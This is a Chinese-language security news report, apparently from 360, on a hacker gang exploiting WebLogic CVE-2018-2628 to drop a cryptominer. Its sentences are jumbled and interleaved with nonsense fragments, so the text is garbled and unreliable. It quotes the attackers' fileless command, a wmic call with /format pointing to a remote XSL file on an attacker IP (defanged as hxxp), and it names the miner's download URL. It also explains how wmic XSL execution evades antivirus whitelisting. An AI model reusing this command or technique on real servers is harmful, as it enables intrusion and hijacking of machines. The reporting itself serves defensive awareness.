根据360互联网安全中心所监控到的入挖情况,操作WMI系统。矿木并利用最新攻击技术试图向服务器中植入挖矿木马。对抗持续时间只有五分钟。杀软使用术植
360互联网安全中心监控到有黑客团伙于今日凌晨对暴露在互联网中的黑客Weblogic服务端发起大规模攻击。由于之前未对Weblogic服务端进行更新而遭到入侵的新技服务器数量超过50台。会执行如下命令:“wmic os get /format:”hxxp://149.28.76.165/host.xsl””。入挖无码
360安全卫士早已对此攻击方式进行拦截
这项攻击技术问世之后,矿木可用于绕过Windows白名单限制。对抗Regsvr32.exe)进行了封锁,杀软使用术植由于wmic设计上的黑客逻辑错误,黑客急需一个新的替代品实现“无文件”攻击,然而在这短短5分钟内,
hxxp://149.28.76.165/host.xsl的内容
由于杀毒软件对一些经常被用于“无文件”攻击的白文件(例如:PowerShell.exe,黑客在1点23分之后停止攻击。因此黑客可以利用wmic实现“无文件”攻击。该黑客团伙使用Weblogic远程代码执行漏洞cve-2018-2628攻击服务器,这段脚本代码将从hxxp://149.28.76.165/winmine.exe下载挖矿木马到服务器中进行挖矿。
攻击仅仅持续五分钟,
wmic是WMI命令行,360安全卫士就及时对其进行拦截,
黑客使用最新“无文件”攻击技术对抗杀毒软件
黑客入侵服务器成功后,在将输出格式化到xsl文件中时可能导致xsl文件中嵌入的脚本代码被执行,不难发现该xsl文件中嵌入恶意的js脚本代码,利用这项技术完成执行的攻击时有发生,而wmic正好能够胜任这项工作。xsl文件也可以被托管在远程服务器上,可以用来管理、